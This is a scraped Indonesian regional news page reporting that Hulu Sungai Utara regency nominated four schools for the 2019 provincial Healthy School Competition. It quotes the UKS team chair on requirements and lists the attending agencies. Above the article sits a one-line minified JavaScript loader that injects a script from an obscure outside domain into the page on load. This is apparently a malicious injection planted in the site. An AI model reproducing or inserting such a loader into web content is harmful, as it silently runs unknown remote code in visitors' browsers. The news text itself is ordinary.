(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Empat Sekolah Disodorkan HSU di Lomba Sehat Tingkat Provinsi


AMUNTAI, Setelah Madrasah Ibtidaiyah Negeri (MIN) 9 HSU masuk nominasi nasional, kini Tim Pembina UKS Kabupaten Hulu Sungai Utara (HSU) kembali  rekomendasikan empat sekolah mewakili pada Lomba Sekolah Sehat (LSS) tingkat Provinsi tahun 2019.

Rekomendasi tersebut dibahas dalam rapat koordinasi pemantapan yang dilakukan Tim Pembina UKS bersama sejumlah stakeholder terkait lainnya, diruang rapat Gedung arsip lantai II, Pemkab HSU, Selasa (8/10).

Empat sekolah yang bakal diikutsertakan dalam LSS tingkat Provinsi Kalsel mulai dari tingkat TK, SD, SMP dan SMA/sederajat itu adalah TK Tunas harapan Sungai karias, SD Babirik Hulu, SMP IT Ihsanul Amal Alabio, SMK 2 Amuntai sehingga tim pengelola UKS merasa perlu persiapan yang benar-benar matang.

“Tidak mudah menjadi peserta lomba sekolah sehat (LSS). Ada beberapa persyaratan yang harus dimiliki dan dipenuhi sekolah, Syarat itu diantaranya, memiliki ruang Usaha Kesehatan Sekolah (UKS) beserta kelengkapannya, ruang keterampilan, kantin, perpustakaan,ruang ibadah, pagar sekolah, WC siswa, tempat cuci tangan, halaman sekolah, beberapa tulisan yang berisi himbauan untuk tidak merokok, apotik hidup, air bersih, kegiatan dokter kecil dan kegiatan ekstrakurikuler (Profil Sekolah),” terang Ketua Tim Pembina UKS HSU H Husairi Abdi.

Dirinya menyebut pihaknya juga perlu selalu menanamkan kesadaran kepada siswa,agar selalu menjaga kebersihan lingkungan. Karena dengan lingkungan sehat, kegiatan belajar mengajar akan terasa nyaman.

Husairi mengaku memberikan dukungan sepenuhnya demi kelancaran lomba sekolah sehat, sembari berpesan pada seluruh tim terkait pada lomba sekolah sehat ini jika ada kendala langsung dapat ditangani bersama.

“Dengan waktu yang singkat ini, seluruh tim lomba sekolah sehat agar memaksimalkan persiapan ini sebaik mungkin, diharapkan dalam penilaiannya nanti berjalan dengan lancar dan mendapatkan hasil yang memuaskan,” imbuh Wakil Bupati HSU ini.

Husairi juga mengharapkan seluruh SKPD diHSU yang terkait untuk ikut mendukung dan berpartisipasi dalam lomba sekolah sehat ini. “Rapat ini diharapkan dapat mempersiapkan sekolah-sekolah yang terkait untuk menghadapi lomba Sekolah Sehat Tingkat Provinsi dengan sebaik-baiknya,” ujarnya.

Dari berbagai pihak sekolah, lanjut Husairi, apabila mengeluhkan tentang lingkungan sekitar sekolah yang masih kurang mendukung dan kendala-kendala lingkungan Sekolah Sehat yang masih perlu di perhatikan, nantinya akan diselesaikan dengan bantuan dari pihak SKPD dan dukungan dari instansi yang terkait lainnya.

Disamping ketua Tim Pembina UKS, hadir pada kegiatan rakor tersebut juga, Asisten 1, Perwakilan Diskominfo, Satpol PP, Dishub, Dinas Pertanian, Dinas Kesehatan, Dinas Pendidikan, serta Disporabudpar serta DPKP- Lingkungan Hidup.(dew)

Reporter : Dew
Editor : Chell


Desy Arfianty

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

10 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

10 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

10 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

11 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

11 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

11 jam ago

This website uses cookies.